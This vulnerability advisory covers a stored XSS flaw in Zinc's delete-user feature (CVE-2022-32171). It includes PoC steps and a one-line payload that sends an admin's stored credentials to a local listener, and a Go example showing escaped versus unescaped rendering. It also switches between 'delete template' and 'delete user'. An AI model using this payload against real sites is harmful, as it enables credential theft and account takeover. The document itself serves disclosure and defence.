CVE-2022-32171
Date: October 6, 2022
Overview
In Zinc, versions v0.1.9 through v0.3.1 are vulnerable to Stored Cross-Site Scripting in the delete user functionality. When an authenticated user deletes a user whose user id field contains an XSS payload, the JavaScript payload is executed and allows an attacker to access that user's credentials.
Details
Zinc is vulnerable to Stored Cross-Site Scripting in the delete template functionality. When an authenticated user deletes a user whose user id field contains an XSS payload, the JavaScript payload is executed. When the payload contains a request to the attacker's domain, the credentials of the user who deleted the template are sent base64-encoded to the attacker, who can then access the site on behalf of that user.
PoC Details
1. Log in to the application as a user and create a new user.
2. Enter the XSS payload from the PoC section below in the user id field. The `localStorage.getItem("creds")` part of the payload needs to be encoded with 'JSFuck'.
3. Start a listener on 8081 to receive the victim's credentials.
4. Now login as an admin user and navigate to the User tab.
5. Under the Actions tab, click the delete button.
6. The JavaScript payload will be executed, and the admin's credentials, encoded in base64, will be sent to the attacker.
PoC Code
"><img src=x onerror=this.src='http://127.0.0.1:8081/?x='+localStorage.getItem("creds")>
Affected Environments
Zinc versions v0.1.9 through v0.3.1
Prevention
Upgrade to Zinc version v0.3.2
Language: Go
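The root cause described above is a user-controlled field (the user id) being placed into the delete confirmation markup without HTML escaping. The following Go program is an added example, not Zinc's own code: it contrasts a hypothetical renderConfirmUnsafe, which builds the confirmation by string formatting, with renderConfirmSafe, which renders the same fragment through html/template so the id is escaped for its HTML context. It assumes a server-side rendered confirmation fragment and uses a constructed payload with a harmless onerror body; Zinc's real UI is not reproduced.

```go
package main

import (
	"bytes"
	"fmt"
	"html/template"
	"strings"
)

// Constructed sample: same shape as the advisory's payload (close the
// attribute, open an element with an event handler), harmless body.
const samplePayload = `"><img src=x onerror=alert(1)>`

// renderConfirmUnsafe builds the delete confirmation by plain string
// formatting. Whatever sits in the user id field becomes markup, which is the
// defect class the advisory describes (hypothetical function, not Zinc's).
func renderConfirmUnsafe(userID string) string {
	return fmt.Sprintf(`<p>Delete user "%s"?</p>`, userID)
}

// confirmTmpl is parsed once; html/template chooses the escaper from the
// position of {{.}} in the markup (here: HTML text content).
var confirmTmpl = template.Must(template.New("confirm").Parse(`<p>Delete user "{{.}}"?</p>`))

// renderConfirmSafe renders the same fragment through html/template. The
// value is escaped for its context, so the browser shows the id as text
// instead of parsing it as an element (hypothetical function, not Zinc's).
func renderConfirmSafe(userID string) (string, error) {
	var buf bytes.Buffer
	if err := confirmTmpl.Execute(&buf, userID); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// containsUnescapedTag is a crude check used only to show the difference:
// a raw "<img" in the rendered fragment means the browser will create an
// element (and fire its event handler); "&lt;img" is inert text.
func containsUnescapedTag(fragment string) bool {
	return strings.Contains(strings.ToLower(fragment), "<img")
}

func main() {
	fmt.Println("unsafe:", renderConfirmUnsafe(samplePayload))
	safe, err := renderConfirmSafe(samplePayload)
	if err != nil {
		panic(err)
	}
	fmt.Println("safe:  ", safe)
}
```

Escaping at render time fixes the symptom in one view; the durable fix, which upgrading to v0.3.2 is meant to deliver, is to make escaped rendering the default everywhere user-supplied identifiers are displayed, rather than relying on each view remembering to escape.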
Good to know:
Base Score: |
---|---
Attack Vector (AV): | Network
Attack Complexity (AC): | Low
Privileges Required (PR): | Low
User Interaction (UI): | Required
Scope (S): | Changed
Confidentiality (C): | Low
Integrity (I): | Low
Availability (A): | None